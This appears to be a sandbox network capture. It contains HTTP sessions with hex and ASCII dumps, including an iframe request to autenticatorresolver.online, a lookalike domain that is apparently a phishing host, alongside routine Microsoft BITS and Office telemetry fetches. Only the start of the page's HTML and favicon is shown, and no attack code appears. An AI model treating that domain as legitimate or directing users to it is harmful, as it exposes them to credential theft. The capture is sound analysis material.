Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:31 UTC	665	OUT	GET /fl/m6kgte57 HTTP/1.1 Host: autenticatorresolver.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:32 UTC	972	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jv6or55hsn994lo1v74lp0b3bq; path=/ expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate pragma: no-cache vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gef5%2B2Y6CiUcEF1p6pTbcNKRytazjusT6R1SYrbdD46qD5IokZePeBlRr9NBm74UOpPvamxAzMuAO8G1GbZk7HP%2BCQMbSgv7QZ3i8xQig%2FxJnon%2FP3Hhkjr8sk6DUcUuiMCgiGRbRcnFzwJTmtk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e89f6f35dfc424b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2871&recv_bytes=1243&delivery_rate=1788120&cwnd=248&unsent_bytes=0&cid=9e27a5f21331d98c&ts=681&x=0"
2024-11-26 12:43:32 UTC	397	IN	Data Raw: 36 61 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 62 61 73 65 36 34 2c 41 41 41 42 41 41 59 41 67 49 41 51 41 41 41 41 41 41 42 6f 4b 41 41 41 5a 67 41 41 41 45 68 49 45 41 41 41 41 41 41 41 36 41 30 41 41 4d 34 6f 41 41 41 77 4d 42 41 41 41 41 41 41 41 47 67 47 41 41 43 32 4e 67 41 41 49 43 41 51 41 41 41 41 41 41 44 6f 41 67 41 41 48 6a 30 41 41 42 67 59 45 41 41 41 41 41 41 41 36 41 45 41 41 41 5a 41 41 41 41 51 45 42 41 41 41 41 41 41 41 43 Data Ascii: 6a34<!DOCTYPE html><html><head> <meta charset="utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAYAgIAQAAAAAABoKAAAZgAAAEhIEAAAAAAA6A0AAM4oAAAwMBAAAAAAAGgGAAC2NgAAICAQAAAAAADoAgAAHj0AABgYEAAAAAAA6AEAAAZAAAAQEBAAAAAAAC
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 41 41 41 41 41 41 41 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 67 41 41 41 44 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 41 41 41 41 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 79 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 41 41 41 41 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d Data Ascii: AAAAAAAiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIgAAADMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIAAAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMyIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiAAAAMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 7a 4d 7a 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 41 41 41 41 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 79 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 41 41 41 41 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 67 41 41 41 44 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a Data Ascii: zMzIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIAAAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMyIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiAAAAMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIgAAADMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMz
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 41 41 41 41 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 67 41 41 41 44 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 41 41 41 41 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d Data Ascii: IiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiAAAAMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIgAAADMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIAAAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 67 41 41 41 44 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 41 41 41 41 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 79 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 49 69 41 41 41 41 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 69 49 69 Data Ascii: iIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIgAAADMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIAAAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMyIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiAAAAMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiIi
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 56 56 56 56 56 56 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVVVVVV
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 41 41 41 41 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 51 41 41 41 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 55 41 41 41 42 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 46 56 56 56 56 56 56 56 56 56 56 Data Ascii: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVAAAARERERERERERERERERERERERERERERERERERERERERVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQAAAEREREREREREREREREREREREREREREREREREREREREVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVUAAABERERERERERERERERERERERERERERERERERERERERFVVVVVVVVVV
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 51 41 41 41 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 55 41 41 41 42 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 41 41 41 41 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 Data Ascii: VVVVVVVVVVVVVVVVVVVVVVVVVQAAAEREREREREREREREREREREREREREREREREREREREREVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVUAAABERERERERERERERERERERERERERERERERERERERERFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVAAAARERERERERERERERERERERERERERERERERERERERERVVVVVVVVVVVVVV
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 55 41 41 41 42 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 41 41 41 41 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 51 41 41 41 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 52 45 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 Data Ascii: VVVVVVVVVVVVVVVVVVVVVUAAABERERERERERERERERERERERERERERERERERERERERFVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVAAAARERERERERERERERERERERERERERERERERERERERERVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQAAAEREREREREREREREREREREREREREREREREREREREREVVVVVVVVVVVVVVVVVV
2024-11-26 12:43:32 UTC	1369	IN	Data Raw: 41 41 41 41 41 41 41 41 42 2b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 66 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 2b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 66 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 2b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 66 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 2b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 66 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 34 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAB+AAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAAH4AAAAAAAAAAAAAAAAAAAB+AAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAAH4AAAAAAAAAAAAAAAAAAAB+AAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAAH4AAAAAAAAAAAAAAAAAAAB+AAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAAH4AAAAAAAAAA

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:31 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-26 12:43:32 UTC	479	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=221804 Date: Tue, 26 Nov 2024 12:43:32 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:32 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:32 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:32 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124332Z-174f78459688l8rvhC1EWRtzr000000007y000000000aupq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:32 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:32 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:32 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:32 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124332Z-174f7845968psccphC1EWRuz9s0000000vr0000000006e2u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:32 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:32 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:32 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:32 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124332Z-174f7845968pf68xhC1EWRr4h80000000vt00000000029yy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:32 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:32 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:32 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:32 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124332Z-174f78459685m244hC1EWRgp2c0000000v8g0000000085pg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:32 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:32 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:32 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:32 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124332Z-174f7845968frfdmhC1EWRxxbw0000000vc000000000bu8p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
